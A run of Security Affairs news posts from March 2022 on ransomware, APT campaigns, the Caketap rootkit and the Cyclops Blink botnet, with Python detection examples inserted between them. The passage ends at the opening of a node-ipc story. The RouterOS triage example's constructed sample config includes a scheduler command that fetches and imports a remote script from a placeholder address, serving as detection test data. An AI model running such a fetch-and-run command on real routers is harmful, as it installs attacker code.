Security Affairs

Read, think, share … Security is everyone's responsibility

Avoslocker ransomware gang targets US critical infrastructure

Sat, 03/19/2022 - 13:03
The Federal Bureau of Investigation (FBI) reported that AvosLocker ransomware is being used in attacks targeting US critical infrastructure.

The Federal Bureau of Investigation (FBI) published a joint cybersecurity advisory warning of AvosLocker ransomware attacks targeting multiple US critical infrastructure sectors.

The advisory was published in coordination with the US Treasury Department and the Financial Crimes Enforcement Network (FinCEN).

“AvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted victims across multiple critical infrastructure sectors in the United States including, but not limited to, the Financial Services, Critical Manufacturing, and Government Facilities sectors. AvosLocker claims to directly handle ransom negotiations, as well as the publishing and hosting of exfiltrated victim data after their affiliates infect targets.” reads the joint advisory. “As a result, AvosLocker indicators of compromise (IOCs) vary between indicators specific to AvosLocker malware and indicators specific to the individual affiliate responsible for the intrusion.”

The joint advisory includes indicators of compromise (IOCs) that network defenders can use to detect and block the threat.

The AvosLocker ransomware-as-a-service emerged in the threat landscape in September 2021. Since January, the group has expanded its targeting by adding support for encrypting Linux systems, specifically VMware ESXi servers.

AvosLocker operators had already advertised a Linux variant of their malware, dubbed AvosLinux, claiming it could target Linux and ESXi servers.

The AvosLocker ransomware appends the .avoslinux extension to the names of all encrypted files, then drops a ransom note in each folder containing encrypted files.

The alert revealed that in some cases the AvosLocker operators called victims by phone, urging them to go to the onion site to negotiate and threatening to leak the stolen data online. In some cases, the gang also threatened and carried out distributed denial-of-service (DDoS) attacks during negotiations.

The AvosLocker leak site claims to have hit victims in the United States, Syria, Saudi Arabia, Germany, Spain, Belgium, Turkey, the United Arab Emirates, the United Kingdom, Canada, China, and Taiwan.

In some cases, AvosLocker negotiators also threaten and launch distributed denial-of-service (DDoS) attacks during negotiations, likely when victims are not cooperating, to pressure them into complying with their demands.

The report also includes a list of mitigation measures to increase the resilience of company networks:

  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
  • Implement network segmentation and maintain offline backups of data to ensure limited interruption to the organization.
  • Regularly back up data, password protect backup copies offline. Ensure copies of critical data are not accessible for modification or deletion from the system where the data resides.
  • Install and regularly update antivirus software on all hosts, and enable real-time detection.
  • Install updates/patch operating systems, software, and firmware as soon as updates/patches are released.
  • Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.
  • Audit user accounts with administrative privileges and configure access controls with least privilege in mind. Do not give all users administrative privileges. Disable unused ports.
  • Consider adding an email banner to emails received from outside your organization.
  • Disable hyperlinks in received emails.
  • Use multifactor authentication where possible.
  • Use strong passwords and regularly change passwords to network systems and accounts, implementing the shortest acceptable timeframe for password changes.
  • Avoid reusing passwords for multiple accounts.
  • Require administrator credentials to install software.
  • Only use secure networks and avoid using public Wi-Fi networks. Consider installing and using a VPN.
  • Focus on cyber security awareness and training. Regularly provide users with training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities (i.e., ransomware and phishing scams).

Follow me on Twitter: @securityaffairs and Facebook


Pierluigi Paganini

(SecurityAffairs – hacking, AvosLocker ransomware)

The post Avoslocker ransomware gang targets US critical infrastructure appeared first on Security Affairs.

Categories: Cyber Security News

Crooks claim to have stolen 4TB of data from TransUnion South Africa

Sat, 03/19/2022 - 12:10
TransUnion South Africa disclosed a data breach: threat actors who stole sensitive data demanded a ransom payment not to release it.

TransUnion South Africa announced that threat actors compromised a company server based in South Africa using stolen credentials. The threat actors stole company data and demanded a ransom payment not to release it.

As a precautionary measure, the company temporarily took part of its infrastructure offline.

“A criminal third party obtained access to a TransUnion South Africa server through misuse of an authorised client’s credentials. We have received an extortion demand and it will not be paid.” reads the statement published by the company.

TransUnion notified law enforcement and the country’s regulators.

The company has stated that it will not pay the ransom and has hired cybersecurity and forensic experts to investigate the extent of the breach.

The company believes the breach only impacted an isolated server holding limited data from South African businesses.

“We are engaging clients in South Africa about this incident. As our investigation progresses, we will notify and assist individuals whose personal data may have been affected. We will be making identity protection products available to impacted consumers free of charge.” continues the statement.

“The security and protection of the information we hold is TransUnion’s top priority”, said Lee Naik, CEO TransUnion South Africa. “We understand that situations like this can be unsettling and TransUnion South Africa remains committed to assisting anyone whose information may have been affected.”

BleepingComputer reported that the Brazilian cybercrime group “N4ughtysecTU” has claimed responsibility for the attack and allegedly stole 4TB of data.

The attackers claim to have hacked a poorly secured TransUnion SFTP server and stolen data related to 54 million customers.

The group told BleepingComputer that it conducted a brute-force attack on the SFTP server and breached an account using the password “Password.”


Pierluigi Paganini

(SecurityAffairs – hacking, Data breach)


Exotic Lily initial access broker works with Conti gang

Sat, 03/19/2022 - 09:15
Google’s Threat Analysis Group (TAG) uncovered a new initial access broker, named Exotic Lily, that is closely affiliated with the Conti ransomware gang.

Google’s Threat Analysis Group (TAG) researchers linked a new initial access broker, named Exotic Lily, to the Conti ransomware operation.

Initial access brokers play an essential role in the cybercrime ecosystem: they provide other threat actors with access to previously compromised organizations.

Exotic Lily was first spotted in September 2021; at the time it was observed distributing the human-operated Conti and Diavol ransomware.

“In early September 2021, Threat Analysis Group (TAG) observed a financially motivated threat actor we refer to as EXOTIC LILY, exploiting a 0day in Microsoft MSHTML (CVE-2021-40444). Investigating this group’s activity, we determined they are an Initial Access Broker (IAB) who appear to be working with the Russian cyber crime gang known as FIN12 (Mandiant, FireEye) / WIZARD SPIDER (CrowdStrike).” reads the post published by Google TAG.

The Exotic Lily cybercrime group exploits the Microsoft Windows MSHTML flaw (CVE-2021-40444) in its phishing campaigns. At the peak of its activity, the threat actors were observed sending more than 5,000 business-proposal-themed emails a day to 650 targeted entities worldwide.

The attack chain associated with EXOTIC LILY has remained relatively consistent over time, Google TAG researchers explained.

The threat actors use domain and identity spoofing to gain “additional credibility” with a targeted organization.

Exotic Lily used spoofed email accounts to send social-engineering lures to organizations in multiple industries and to establish a trusted contact with the targeted entities.

Exotic Lily also abused the built-in email notification feature of legitimate file-sharing services (e.g., WeTransfer, TransferNow and OneDrive) to share links to malicious files with victims while evading detection.

In March, the group was observed delivering ISO files containing a DLL with the custom loader BUMBLEBEE. BUMBLEBEE uses WMI to collect system information about the target, including OS version, user name and domain name. BUMBLEBEE was also observed fetching Cobalt Strike payloads.

Analysis of the threat actor’s communications revealed that the group works a typical 9-to-5 schedule on weekdays, with very little activity during weekends. The actor’s working hours suggest they may be operating from a Central or Eastern Europe time zone.

“We believe the shift to deliver BazarLoader, along with some other indicators such as a unique Cobalt Strike profile (described by RiskIQ) further confirms the existence of a relationship between EXOTIC LILY and actions of a Russian cyber crime group tracked as WIZARD SPIDER (CrowdStrike), FIN12 (Mandiant, FireEye) and DEV-0193 (Microsoft).” the researchers concluded. “While the nature of those relationships remains unclear, EXOTIC LILY seems to operate as a separate entity, focusing on acquiring initial access through email campaigns, with follow-up activities that include deployment of Conti and Diavol ransomware, which are performed by a different set of actors.”


Pierluigi Paganini

(SecurityAffairs – hacking, Conti)


Emsisoft releases free decryptor for the victims of the Diavol ransomware

Sat, 03/19/2022 - 06:51
Cybersecurity firm Emsisoft released a free decryptor that allows the victims of the Diavol ransomware to recover their files without paying a ransom.

Cybersecurity firm Emsisoft has released a free decryption tool to help Diavol ransomware victims recover their files without paying a ransom.

In January, the FBI officially linked the Diavol ransomware operation to the infamous TrickBot gang, the group behind the TrickBot banking trojan.

TrickBot is a popular banking Trojan that has been around since October 2016; its authors have continuously upgraded it with new features. Its operators offer the botnet through a multi-purpose malware-as-a-service (MaaS) model, and threat actors leverage it to distribute a broad range of malware, including info-stealers and ransomware such as Conti and Ryuk. To date, the TrickBot botnet has infected more than a million computers.

The TrickBot Gang is also behind the development of the BazarBackdoor and Anchor backdoors.

In July, researchers from Fortinet first spotted the new ransomware family, tracked as Diavol, and speculated that it might have been developed by Wizard Spider, the cybercrime gang behind the TrickBot botnet.

Fortinet experts noticed similarities between Diavol and Conti, but unlike Conti, Diavol does not avoid infecting Russian victims.

In August 2021, IBM X-Force researchers analyzed an older variant of the threat which, unlike the one analyzed by Fortinet, appears to be a development version used for testing purposes.

Comparing the two versions gave the researchers insight into Diavol’s development process and into likely future versions of the malware.

The analysis conducted by IBM X-Force researchers reinforced the link between Diavol ransomware and the TrickBot malware.

The free decryptor for the Diavol ransomware released by Emsisoft can be downloaded here; the company also released a guide for the tool.

“The decryptor requires access to a file pair consisting of one encrypted file and the original, unencrypted version of the encrypted file to reconstruct the encryption keys needed to decrypt the rest of your data. This file must be roughly 20KB or larger in size. Please do not change the file names of the original and encrypted files, as the decryptor may perform file name comparisons to determine the correct file extension used for encrypted files on your system.” reads the guide for the decryptor.

Experts pointed out that the decryptor cannot guarantee that the decrypted data is identical to the original, because the ransomware does not save any information about the unencrypted files.

Experts also warn that, due to technical limitations, the decryptor may not be able to decrypt files larger than the file pair provided.
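The two constraints in the guide (an original/encrypted pair, and no recovery of files larger than that pair) both follow from known-plaintext key recovery. The illustration below is an added example, not Emsisoft's decryptor and not Diavol's actual cipher: it assumes, purely for the sake of the example, a scheme that XORs every file with the same keystream from offset 0, and the file names, sizes and the hypothetical ".locked" extension are constructed.

```python
"""Why a decryptor needs an original/encrypted file pair, and why the pair's size caps it.

Added illustration. The toy cipher here is an assumption for the example only;
Diavol's real algorithm is not described on this page.
"""
import hashlib
from typing import Optional


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncated to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


# Constructed 96-byte "keystream" standing in for the secret the ransomware used.
# Derived from a fixed string only so the example is reproducible.
SECRET_KEYSTREAM = hashlib.sha256(b"constructed-example").digest() * 3


def toy_encrypt(plaintext: bytes, keystream: bytes = SECRET_KEYSTREAM) -> bytes:
    """Stand-in for the ransomware's file encryption (assumed scheme, not Diavol's)."""
    if len(plaintext) > len(keystream):
        raise ValueError("file longer than the keystream this toy scheme supports")
    return xor_bytes(plaintext, keystream[: len(plaintext)])


def infer_encrypted_extension(original_name: str, encrypted_name: str) -> Optional[str]:
    """The guide's 'file name comparison': the appended extension is whatever follows
    the original name. None when the names do not line up (e.g. a renamed file)."""
    if encrypted_name == original_name or not encrypted_name.startswith(original_name):
        return None
    return encrypted_name[len(original_name):]


def recover_keystream(original: bytes, encrypted: bytes) -> bytes:
    """Known-plaintext recovery: keystream byte = plaintext byte ^ ciphertext byte.
    Only as many bytes as the shorter file of the pair can be recovered."""
    n = min(len(original), len(encrypted))
    return xor_bytes(original[:n], encrypted[:n])


def decrypt_with_recovered(encrypted: bytes, keystream: bytes) -> Optional[bytes]:
    """Returns None for files longer than the recovered keystream: the
    'may not be able to decrypt files larger than the file pair' limitation."""
    if len(encrypted) > len(keystream):
        return None
    return xor_bytes(encrypted, keystream[: len(encrypted)])


def demo() -> dict:
    """Run the whole flow on constructed files (tiny here; the real guide wants ~20 KB+)."""
    pair_plain = bytes(range(64))                              # the original we still have
    pair_cipher = toy_encrypt(pair_plain)                      # its encrypted twin
    small_cipher = toy_encrypt(b"quarterly-report-v2 " * 2)   # 40 bytes, shorter than the pair
    big_cipher = toy_encrypt(b"Z" * 90)                        # 90 bytes, longer than the pair

    ks = recover_keystream(pair_plain, pair_cipher)
    return {
        "ext": infer_encrypted_extension("invoice.pdf", "invoice.pdf.locked"),
        "keystream_len": len(ks),
        "small": decrypt_with_recovered(small_cipher, ks),   # recovered in full
        "big": decrypt_with_recovered(big_cipher, ks),       # None: pair too small
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```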


Pierluigi Paganini

(SecurityAffairs – hacking, Diavol ransomware)


China-linked threat actors are targeting the government of Ukraine

Fri, 03/18/2022 - 17:12
Google’s TAG team revealed that China-linked APT groups are targeting Ukraine’s government for intelligence purposes.

Google’s Threat Analysis Group (TAG) researchers uncovered cyberespionage operations conducted by the Chinese People’s Liberation Army (PLA) and other China-linked APT groups that targeted Ukraine’s government to gather information on the ongoing conflict. Below is the tweet published by TAG chief Shane Huntley, who cited Google TAG Security Engineer Billy Leonard.

“It should come as no surprise that CN PLA and other CN intel orgs are acutely interested in the war in Ukraine. Over the last few weeks @Google TAG has identified a govt backed actor from CN targeting Ukrainian govt orgs, and we provided notifications to impacted parties.” wrote Leonard.

The Ukraine war isn’t only attracting interest from European threat actors. China is working hard here too. https://t.co/8bpXsGQvD7

— Shane Huntley (@ShaneHuntley) March 15, 2022

Google TAG team notified Ukrainian government organizations that were targeted by Chinese intelligence.

“Over the last few weeks Google TAG has identified a govt backed actor from CN targeting Ukrainian govt orgs, and we provided notifications to impacted parties,” Leonard said.

It should come as no surprise that CN PLA and other CN intel orgs are acutely interested in the war in Ukraine. Over the last few weeks @Google TAG has identified a govt backed actor from CN targeting Ukrainian govt orgs, and we provided notifications to impacted parties. https://t.co/WALjGL6v5Z

— billy leonard (@billyleonard) March 15, 2022

While our priority is providing notifications to impacted parties, we've provided related IOCs to community partners, and we will publish more details for the security community in the near future. We will continue to update our recent blog as necessary.https://t.co/5ZJUgz3Snt

— billy leonard (@billyleonard) March 15, 2022

The hacktivist collective Intrusion Truth believes the campaign was orchestrated directly by the Chinese government. Google TAG, for its part, announced that it is sharing IOCs with community partners and plans to provide additional details on the ongoing attacks in the future.

Google recently announced that it blocked a phishing campaign conducted by the China-linked cyberespionage group APT31 (aka Zirconium, Judgment Panda, and Red Keres) and aimed at Gmail users associated with the U.S. government.

Google also reported that the China-linked Mustang Panda cyberespionage group (aka Temp.Hex) has targeted European entities with lures related to the Ukrainian invasion. In some attacks spotted by Google, the threat actors used malicious attachments with file names such as ‘Situation at the EU borders with Ukraine.zip’. The researchers pointed out that this is the first time they have observed Mustang Panda targeting European entities; the group has regularly been observed targeting Southeast Asian organizations.


Pierluigi Paganini

(SecurityAffairs – hacking, Ukraine)


Caketap, a new Unix rootkit used to siphon ATM banking data

Fri, 03/18/2022 - 11:41
Experts spotted a new Unix rootkit, called Caketap, that was used to steal ATM banking data.

Mandiant researchers discovered a new Unix rootkit named Caketap, which is used to steal ATM banking data, while investigating the activity of the LightBasin cybercrime group (aka UNC1945).

The China-linked hacking group has been active since at least 2016 and, according to CrowdStrike researchers, uses a very sophisticated toolset. CrowdStrike reported that at least 13 telecommunication companies have been compromised by the group since 2019.

The group hacked mobile telephone networks around the globe and used specialized tools to access calling records and text messages from telecommunications companies.

Now Mandiant researchers have documented LightBasin activity targeting bank customers and focusing on card fraud.

The Caketap rootkit is a Unix kernel module that the UNC2891 threat actor deployed on servers running Oracle Solaris. CAKETAP operates stealthily by hiding network connections, processes, and files. Upon initialization, the malware removes itself from the loaded modules list and updates last_module_id with the previously loaded module to remove any trace of its presence.

To identify CAKETAP running on a Solaris system, administrators can check for the presence of a hook installed in the ipcl_get_next_conn function.

Below is an example command to identify a hooked ipcl_get_next_conn function:

# echo 'ipcl_get_next_conn::dis -n 0 ; ::quit' | mdb -k

The output on a clean SPARC Solaris system would look similar to the following:

ipcl_get_next_conn: save %sp, -0xb0, %sp

Mandiant researchers reported that the rootkit supports the following commands:

Command   Function
(empty)   Add the CAKETAP module back to the loaded modules list
M         Change the signal string for the getdents64 hook
I         Add a network filter (format <IP>p<PORT>)
i         Remove a network filter
P         Set the current thread TTY to not be filtered by the getdents64 hook
p         Set all TTYs to be filtered by the getdents64 hook
S         Display the current configuration

Caketap was designed to intercept banking card and PIN verification data from compromised ATM switch servers and carry out unauthorized transactions.

“Memory forensics from one victim’s ATM switch server revealed a variant of CAKETAP with additional network hooking functionality that intercepted specific messages relating to card and pin verification. Evidence suggests that this variant of CAKETAP was used as part of an operation to perform unauthorized transactions using fraudulent bank cards.” reads the analysis published by Mandiant. “This CAKETAP variant targeted specific messages destined for the Payment Hardware Security Module (HSM).”

Caketap can manipulate card verification messages and respond to PIN verification messages.

The malware saves valid messages matching non-fraudulent PANs (Primary Account Numbers) internally and forwards them to the HSM, so as not to impact legitimate customer transactions and arouse suspicion.

“Based on Mandiant’s investigation findings, we believe that CAKETAP was leveraged by UNC2891 as part of a larger operation to successfully use fraudulent bank cards to perform unauthorized cash withdrawals from ATM terminals at several banks.” concludes the report. “UNC2891 maintains a high level of OPSEC and employs several techniques to evade detection. The actor uses their skill and experience to take full advantage of the decreased visibility and security measures that are often present in Unix and Linux environments. Mandiant expects that UNC2891 will continue to capitalize on this and perform similar operations for financial gain that target mission critical systems running these operating systems.”


Pierluigi Paganini

(SecurityAffairs – hacking, Caketap)


Red TIM Research (RTR) team discovers a bug on Ericsson Network Manager

Fri, 03/18/2022 - 10:38
TIM Red Team Research (RTR) researchers discovered a new flaw in Ericsson Network Manager, Ericsson’s flagship network product.

The TIM Red Team Research (RTR) team discovered a new vulnerability affecting Ericsson Network Manager, known as Ericsson’s flagship network product.

Ericsson Network Manager and network OSS

As mentioned, this is an Ericsson flagship network product: it enables the management of mobile radio networks and their evolutions, covering conventional out-of-the-box deployments as well as cloud-based technologies (ready to manage the transition from 4G to 5G and continuously updated for the next technological innovation).

Ericsson Network Manager is an Operations Support System (‘OSS’ in network jargon) that manages all the devices connected to it, handling configurations, firmware updates, and all the automation and maintenance operations of an advanced mobile radio network.

It also supports the management of advanced virtual network functions (VNFM), combined with automatic analysis and scaling capabilities based on criteria that interact with various standard distributions.

The system is therefore scalable and provides high capacity through an implementation that allows existing OSS sites to be consolidated in order to grow or manage greater complexity.

Research Activity

The vulnerabilities were isolated in the TIM laboratory, where the bug hunters Alessandro Bosco and Mohamed Amine Ouad, led by Massimiliano Brolli, who is in charge of the project, started the Coordinated Vulnerability Disclosure (CVD) process with Ericsson, as reported on the project website.

According to the TIM website, CVE-2021-28488 has been issued for the flaw, classified under the CWE Exposure of Resource to Wrong Sphere. MITRE describes the issue as follows:

Ericsson Network Manager (ENM) before 21.2 has incorrect access-control behavior (that only affects the level of access available to persons who were already granted a highly privileged role). Users in the same AMOS authorization group can retrieve managed-network data that was not set to be accessible to the entire group (i.e., was only set to be accessible to a subset of that group).

TIM Red Team Research

This is one of the few Italian industrial research centers focused on security bugs. For a few years it has performed “bug hunting” activities aimed at finding undocumented vulnerabilities, leading to the issuance of a Common Vulnerabilities and Exposures (CVE) entry in the National Vulnerability Database of the United States once the Coordinated Vulnerability Disclosure (CVD) with the vendor is complete.

In two years of activity, the team has found many 0-days in very popular products from big vendors such as Oracle, IBM, Ericsson, Nokia, Computer Associates, Siemens, QNAP, Johnson Controls and Schneider Electric, as well as other vendors, across different types of software architectures.

Regarding a vulnerability found in Johnson Controls’ Metasys Reporting Engine (MRE) Web Services product, the Cybersecurity and Infrastructure Security Agency (CISA) of the United States issued a dedicated security bulletin listing as background the following: “CRITICAL INFRASTRUCTURE SECTORS, COUNTRIES/AREAS USED and COMPANY HEADQUARTERS”. It is an all-Italian organization that issues a CVE every 6 working days, contributing internationally to the research of undocumented vulnerabilities and to the security of products used by many organizations and individuals.


Pierluigi Paganini

(SecurityAffairs – hacking, Ericsson Network Manager)


Russia-linked Cyclops Blink botnet targeting ASUS routers

Fri, 03/18/2022 - 08:43
The recently discovered Cyclops Blink botnet, which is believed to be a replacement for the VPNFilter botnet, is now targeting the ASUS routers.

The recently discovered Cyclops Blink botnet is now targeting ASUS routers, Trend Micro researchers report.

The Cyclops Blink malware has been active since at least June 2019; it targets WatchGuard Firebox and other Small Office/Home Office (SOHO) network devices. According to WatchGuard, Cyclops Blink may have affected roughly 1% of all active WatchGuard firewall appliances.

In February, US and UK cybersecurity and law enforcement agencies published a joint security advisory about the Cyclops Blink bot that has been linked to the Russian-backed Sandworm APT group.

Sandworm (aka BlackEnergy and TeleBots) has been active since 2000 and operates under the control of Unit 74455 of the Russian GRU’s Main Center for Special Technologies (GTsST).

The group is also the author of the NotPetya ransomware that hit hundreds of companies worldwide in June 2017, causing billions in damage.

Cyclops Blink is believed to be a replacement for the VPNFilter botnet, which was first exposed in 2018 and at the time was composed of more than 500,000 compromised routers and network-attached storage (NAS) devices.

“Our data also shows that although Cyclops Blink is a state-sponsored botnet, its C&C servers and bots affect WatchGuard Firebox and Asus devices that do not belong to critical organizations, or those that have an evident value on economic, political, or military espionage.” reads the advisory published by TrendMicro. “Hence, we believe that it is possible that the Cyclops Blink botnet’s main purpose is to build an infrastructure for further attacks on high-value targets.”

Cyclops Blink is a nation-state botnet with a modular architecture, written in C. Upon executing the core component, the malware first checks whether its executable file name starts with “[k”. If it does not, it performs the following routine:

  1. It redirects both stdout and stderr file descriptors to /dev/null. 
  2. It sets the default handlers for SIGTERM, SIGINT, SIGBUS, SIGPIPE, and SIGIO signals. 
  3. It reloads itself with a new “[ktest]” process name. 

The bot then waits 37 seconds before setting up its hard-coded parameters, including the hard-coded C2 servers and the interval at which it should contact them.

For every hard-coded TCP port used to communicate with the C2 servers, the bot creates a rule in the Linux kernel firewall Netfilter.
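One way to hunt for the “[ktest]” disguise described above on a Linux host, as an added example that is not from Trend Micro's report or the original post: it assumes that a renamed user-space process still has a non-empty /proc/<pid>/cmdline or a resolvable /proc/<pid>/exe, neither of which a genuine kernel thread has (ps adds the brackets only because the cmdline is empty). The pids, names and paths in the sample snapshot are constructed.

```python
"""Spot user-space processes hiding behind a kernel-thread-style name.

Added example (not from Trend Micro or Security Affairs). Genuine kernel threads
have an empty /proc/<pid>/cmdline and no /proc/<pid>/exe target; a bracketed
name on a process that has either is the anomaly this scan reports.
"""
import os
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# "[ktest]", "[kworker/0:1]" ... the display form ps uses for kernel threads.
BRACKETED = re.compile(r"^\[[^\]]*\]$")


@dataclass
class ProcInfo:
    pid: int
    comm: str            # /proc/<pid>/comm (prctl PR_SET_NAME changes this)
    cmdline: str         # /proc/<pid>/cmdline, NUL-separated; empty for kernel threads
    exe: Optional[str]   # readlink(/proc/<pid>/exe), None when unresolvable

    @property
    def argv0(self) -> str:
        return self.cmdline.split("\0", 1)[0]


def is_disguised_kthread(p: ProcInfo) -> bool:
    """True when the name looks like a kernel thread but the process owns user-space state.
    Both comm and argv[0] are checked because the report does not say which one the bot sets."""
    looks_kernel = bool(BRACKETED.match(p.comm) or BRACKETED.match(p.argv0))
    is_userspace = bool(p.cmdline) or p.exe is not None
    return looks_kernel and is_userspace


def find_disguised(procs: Iterable[ProcInfo]) -> List[ProcInfo]:
    return [p for p in procs if is_disguised_kthread(p)]


def read_proc_info(pid: int) -> Optional[ProcInfo]:
    """Collect comm, cmdline and exe for one pid from /proc (Linux only)."""
    base = f"/proc/{pid}"
    try:
        with open(f"{base}/comm") as f:
            comm = f.read().rstrip("\n")
        with open(f"{base}/cmdline", "rb") as f:
            cmdline = f.read().decode("utf-8", "replace")
    except OSError:
        return None            # process exited (or is unreadable) while we were looking
    try:
        exe = os.readlink(f"{base}/exe")
    except OSError:
        exe = None             # kernel threads and zombies land here
    return ProcInfo(pid, comm, cmdline, exe)


def scan_live_system() -> List[ProcInfo]:
    """Walk /proc and return the suspicious processes; empty list where /proc is absent."""
    try:
        pids = [int(n) for n in os.listdir("/proc") if n.isdigit()]
    except OSError:
        return []
    procs = []
    for pid in pids:
        info = read_proc_info(pid)
        if info is not None:
            procs.append(info)
    return find_disguised(procs)


# Constructed sample snapshot (not real telemetry); pids, names and paths are made up.
SAMPLE_PROCS = [
    ProcInfo(2, "kthreadd", "", None),                        # real kernel thread
    ProcInfo(15, "kworker/0:1", "", None),                    # real kernel thread
    ProcInfo(1337, "nginx", "nginx: worker process\0", "/usr/sbin/nginx"),
    ProcInfo(4242, "[ktest]", "[ktest]\0", "/tmp/.cfg/cb"),   # comm and argv[0] both spoofed
    ProcInfo(4243, "cb", "[ktest]\0", "/tmp/.cfg/cb"),        # argv[0] spoofed only
]

if __name__ == "__main__":
    for p in find_disguised(SAMPLE_PROCS) + scan_live_system():
        print(f"pid {p.pid}: comm={p.comm!r} argv0={p.argv0!r} exe={p.exe}")
```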

Since June 2019, the malware has infected WatchGuard devices and ASUS routers in many countries, including the U.S., India, Italy, Canada, and Russia. Experts pointed out that these victims do not appear to be evidently valuable targets for economic, military, or political espionage. Trend Micro observed that some of the live C&Cs are hosted on WatchGuard devices used by a law firm in Europe, a medium-sized company producing medical equipment for dentists in Southern Europe, and a plumber in the United States.

Experts warn of an increase in IoT attacks on a global scale, making internet routers one of the primary targets.

“Once an IoT device is infected with malware, an attacker can have unrestricted internet access for downloading and deploying more stages of malware for reconnaissance, espionage, proxying, or anything else that the attacker wants to do. The underlying operating systems for the majority of IoT devices is Linux, which is also used by many powerful systems tools. This can allow attackers to add anything else that they might need to complete their attacks.” concludes the report. “In the case of Cyclops Blink, we have seen devices that were compromised for over 30 months (about two and a half years) in a row and were being set up as stable C&C servers for other bots. “


Pierluigi Paganini

(SecurityAffairs – hacking, Cyclops Blink)

The post Russia-linked Cyclops Blink botnet targeting ASUS routers appeared first on Security Affairs.

Categories: Cyber Security News

Microsoft releases open-source tool for checking MikroTik Routers compromise

Fri, 03/18/2022 - 02:32
Microsoft released an open-source tool to secure MikroTik routers and check for indicators of compromise for Trickbot malware infections.

Microsoft has released an open-source tool, dubbed RouterOS Scanner, that can be used to secure MikroTik routers and check for indicators of compromise associated with Trickbot malware infections.

“This analysis has enabled us to develop a forensic tool to identify Trickbot-related compromise and other suspicious indicators on MikroTik devices. We published this tool to help customers ensure these IoT devices are not susceptible to these attacks.” reads the post published by Microsoft.

Recently, Check Point researchers reported that the infamous TrickBot malware was employed in attacks against customers of 60 financial and technology companies, with new anti-analysis features. The new wave of attacks was aimed at cryptocurrency firms, most of them located in the U.S.

TrickBot is a popular Windows banking Trojan that has been around since October 2016; its authors have continuously upgraded it with new features, including powerful password-stealing capabilities.

TrickBot initially partnered with the Ryuk ransomware gang, which used it for initial access to the networks compromised by the botnet. Ryuk was later replaced by the Conti ransomware gang, which has been using TrickBot for the same purpose.

In 2021, the Conti gang used TrickBot exclusively to gain initial access to the networks of organizations worldwide.

AdvIntel researchers recently reported that the Conti ransomware group has taken over the TrickBot malware operation and plans to replace it with the BazarBackdoor malware.

The Trickbot operation has switched to using MikroTik routers as C&C servers since 2020.

Microsoft analyzed how the malware compromised MikroTik routers and developed a tool to detect signs of compromise. The attack chain against the routers starts either with brute-force attacks or with the exploitation of the CVE-2018-14847 flaw, which allows reading a file that contains passwords.

“The attackers then issue a unique command that redirects traffic between two ports in the router, establishing the line of communication between Trickbot-affected devices and the C2,” continues the post. “MikroTik devices have unique hardware and software, RouterBOARD and RouterOS. This means that to run such a command, the attackers need expertise in RouterOS SSH shell commands.”

RouterOS Scanner checks the device version and maps it to known vulnerabilities. It also looks for scheduled tasks, traffic redirection rules (NAT and other rules), DNS cache poisoning, default port changes, non-default users, suspicious files, and proxy, SOCKS, and firewall rules.
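As an added example (not Microsoft's RouterOS Scanner), the script below walks a RouterOS `/export` text and flags the kinds of artefacts listed above: dst-nat port redirection, scheduler tasks that fetch and import remote content, users other than the default `admin`, and SOCKS/proxy being enabled. The sample export, its addresses, ports and user names are constructed for the demo.

```python
"""Triage of a RouterOS configuration export for Trickbot-style tampering.

Constructed example, not Microsoft's tool.  A RouterOS export lists a menu
path (e.g. "/ip firewall nat") followed by "add ..."/"set ..." entries made
of key=value tokens; quoted values may contain spaces and semicolons.
"""
import re
import shlex
from collections import defaultdict
from typing import Dict, List

# Constructed sample export: one dst-nat redirect to an external host, SOCKS
# enabled, a scheduler that fetches and imports a remote script, an extra user.
SAMPLE_EXPORT = """\
# constructed sample, not a real device
/ip firewall nat
add action=masquerade chain=srcnat out-interface=ether1
add action=dst-nat chain=dstnat dst-port=449 protocol=tcp to-addresses=198.51.100.23 to-ports=80
/ip socks
set enabled=yes port=1080
/system scheduler
add interval=1d name=update on-event="/tool fetch url=http://198.51.100.23/s.rsc mode=http; /import s.rsc" start-time=startup
/user
add name=admin group=full
add name=support group=full
"""


def parse_export(text: str) -> Dict[str, List[Dict[str, str]]]:
    """Map each menu path to its entries, each entry a dict of key=value pairs."""
    sections: Dict[str, List[Dict[str, str]]] = defaultdict(list)
    path = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("/"):          # new menu path
            path = line
            continue
        if path is None:
            continue
        tokens = shlex.split(line)        # keeps quoted on-event scripts intact
        entry = {"_cmd": tokens[0]}
        for tok in tokens[1:]:
            if "=" in tok:
                key, value = tok.split("=", 1)
                entry[key] = value
        sections[path].append(entry)
    return sections


def findings(sections: Dict[str, List[Dict[str, str]]]) -> List[str]:
    """Return human-readable findings for the suspicious artefacts found."""
    out: List[str] = []
    for e in sections.get("/ip firewall nat", []):
        if e.get("action") == "dst-nat":
            out.append(
                f"dst-nat redirect: {e.get('protocol', '?')}/{e.get('dst-port', '?')}"
                f" -> {e.get('to-addresses', '?')}:{e.get('to-ports', '?')}"
            )
    for e in sections.get("/system scheduler", []):
        event = e.get("on-event", "")
        if re.search(r"/tool fetch|/import", event):
            out.append(f"scheduler '{e.get('name')}' runs remote fetch/import: {event}")
    for e in sections.get("/user", []):
        if e.get("name") and e["name"] != "admin":
            out.append(f"non-default user: {e['name']} (group={e.get('group', '?')})")
    for path in ("/ip socks", "/ip proxy"):
        for e in sections.get(path, []):
            if e.get("enabled") == "yes":
                out.append(f"{path} enabled on port {e.get('port', '?')}")
    return out


if __name__ == "__main__":
    for line in findings(parse_export(SAMPLE_EXPORT)):
        print("[!]", line)
```

Feed it the output of `/export` saved from a device instead of `SAMPLE_EXPORT` to triage a real configuration; every hit still needs review against what the administrator actually configured.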


Pierluigi Paganini

(SecurityAffairs – hacking, RouterOS Scanner)


node-ipc NPM Package sabotage to protest Ukraine invasion

Thu, 03/17/2022 - 20:16
The developer behind the popular “node-ipc” NPM package uploaded a destructive version to protest Russia’s invasion of Ukraine.

